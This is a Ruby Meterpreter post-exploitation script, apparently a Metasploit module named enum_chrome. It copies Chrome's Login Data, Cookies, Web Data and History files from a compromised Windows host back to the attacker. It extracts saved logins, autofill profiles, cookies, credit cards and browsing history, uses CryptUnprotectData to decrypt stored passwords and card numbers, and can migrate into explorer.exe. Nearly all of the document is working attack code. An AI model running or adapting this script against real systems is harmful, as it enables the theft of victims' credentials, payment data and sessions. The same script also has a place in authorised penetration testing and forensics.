# # Script to extract data from a chrome installation. # # Author: Sven Taute # require 'sqlite3' require 'yaml' if client.platform !~ /win32/ print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end @host_info = client.sys.config.sysinfo @chrome_files = [ { :in_file => "Web Data", :sql => "select * from autofill;", :out_file => "autofill"}, { :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;", :out_file => "user_site"}, { :in_file => "Web Data", :sql => "select * from autofill_profiles;", :out_file => "autofill_profiles"}, { :in_file => "Web Data", :sql => "select * from credit_cards;", :out_file => "autofill_credit_cards", :encrypted_fields => ["card_number_encrypted"]}, { :in_file => "Cookies", :sql => "select * from cookies;", :out_file => "cookies"}, { :in_file => "History", :sql => "select * from urls;", :out_file => "url_history"}, { :in_file => "History", :sql => "SELECT url FROM downloads;", :out_file => "download_history"}, { :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;", :out_file => "search_history"}, { :in_file => "Login Data", :sql => "select * from logins;", :out_file => "logins", :encrypted_fields => ["password_value"]}, { :in_file => "Bookmarks", :sql => nil, :out_file => "bookmarks.json"}, { :in_file => "Preferences", :sql => nil, :out_file => "preferences.json"}, ] @migrate = false @old_pid = nil @output_format = [] opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu" ], "-m" => [ false, "Migrate into explorer.exe"], "-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"] ) opts.parse(args) { |opt, idx, val| case opt when "-m" @migrate = true when "-f" if val =~ /^j(son)?$/ @output_format << "json" elsif val =~ /^y(aml)?$/ @output_format << "yaml" elsif val =~ /^t(ext)?$/ @output_format << "text" else print_error("unknown format '#{val}'.") raise Rex::Script::Completed end when "-h" print_line("") print_line("DESCRIPTION: Script for enumerating preferences and extracting") print_line("information from the Google Chrome Browser on a target system.") print_line("Decryption of creditcard information and passwords only supported") print_line("on 32bit Windows Operating Systems.") print_line("") print_line("USAGE: run enum_chrome [-m]") print_line(opts.usage) raise Rex::Script::Completed end } @output_format << "json" if @output_format.empty? if @output_format.include?("json") begin require 'json' rescue LoadError print_error("JSON is not available.") @output_format.delete("json") if @output_format.empty? print_status("Falling back to raw text output.") @output_format << "text" end end end print_status("using output format(s): " + @output_format.join(", ")) def prepare_railgun rg = client.railgun if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end if (!rg.crypt32.functions["CryptUnprotectData"]) rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [ ["PBLOB","pDataIn", "in"], ["PWCHAR", "szDataDescr", "out"], ["PBLOB", "pOptionalEntropy", "in"], ["PDWORD", "pvReserved", "in"], ["PBLOB", "pPromptStruct", "in"], ["DWORD", "dwFlags", "in"], ["PBLOB", "pDataOut", "out"] ]) end end def decrypt_data(data) rg = client.railgun pid = client.sys.process.open.pid process = client.sys.process.open(pid, PROCESS_ALL_ACCESS) mem = process.memory.allocate(1024) process.memory.write(mem, data) addr = [mem].pack("V") len = [data.length].pack("V") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) len, addr = ret["pDataOut"].unpack("V2") return "" if len == 0 decrypted = process.memory.read(addr, len) end def write_output(file, rows) if @output_format.include?("json") ::File.open(file + ".json", "w") { |f| f.write(JSON.pretty_generate(rows)) } end if @output_format.include?("yaml") ::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) } end if @output_format.include?("text") ::File.open(file + ".txt", "w") do |f| f.write(rows.first.keys.join("\t") + "\n") f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n")) end end end def process_files(username) @chrome_files.each do |item| in_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:in_file]) out_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:out_file]) if item[:sql] db = SQLite3::Database.new(in_file) columns, *rows = db.execute2(item[:sql]) db.close rows.map! do |row| res = Hash[*columns.zip(row).flatten] if item[:encrypted_fields] && client.sys.config.getuid != "NT AUTHORITY\\SYSTEM" if @host_info['Architecture'] !~ /x64/ item[:encrypted_fields].each do |field| print_good("decrypting field '#{field}'...") res[field + "_decrypted"] = decrypt_data(res[field]) end else print_error("Can not decrypt #{item[:out_file]}, decryption only supported in 32bit OS") end end res end if rows.length > 0 print_status("writing output '#{item[:out_file]}'...") write_output(out_file, rows) else print_status("no '#{item[:out_file]}' data found in file '#{item[:in_file]}'") end else ::FileUtils.cp(in_file, out_file) end end end def extract_data(username) chrome_path = @profiles_path + "\\" + username + @data_path begin client.fs.file.stat(chrome_path) rescue print_status("no files found for user '#{username}'") return false end @chrome_files.map{ |e| e[:in_file] }.uniq.each do |f| remote_path = chrome_path + '\\' + f local_path = File.join(@log_dir, Rex::FileUtils.clean_path(username), f) print_status("downloading file #{f} to '#{local_path}'...") client.fs.file.download_file(local_path, remote_path) end return true end if @migrate current_pid = client.sys.process.open.pid target_pid = client.sys.process["explorer.exe"] if target_pid != current_pid @old_pid = current_pid print_status("current PID is #{current_pid}. migrating into explorer.exe, PID=#{target_pid}...") client.core.migrate(target_pid) print_status("done.") end end host = session.session_host @log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M")) ::FileUtils.mkdir_p(@log_dir) sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%") os = @host_info['OS'] if os =~ /(Windows 7|2008|Vista)/ @profiles_path = sysdrive + "\\Users\\" @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default" elsif os =~ /(2000|NET|XP)/ @profiles_path = sysdrive + "\\Documents and Settings\\" @data_path = "\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default" end usernames = [] uid = client.sys.config.getuid if is_system? print_status "running as SYSTEM, extracting user list..." print_status "(decryption of passwords and credit card numbers will not be possible)" client.fs.dir.foreach(@profiles_path) do |u| usernames << u if u !~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/ end print_status "users found: #{usernames.join(", ")}" else print_status "running as user '#{uid}'..." usernames << client.fs.file.expand_path("%USERNAME%") prepare_railgun end usernames.each do |u| print_status("extracting data for user '#{u}'...") success = extract_data(u) process_files(u) if success end if @migrate && @old_pid print_status("migrating back into PID=#{@old_pid}...") client.core.migrate(@old_pid) print_status("done.") end raise Rex::Script::Completed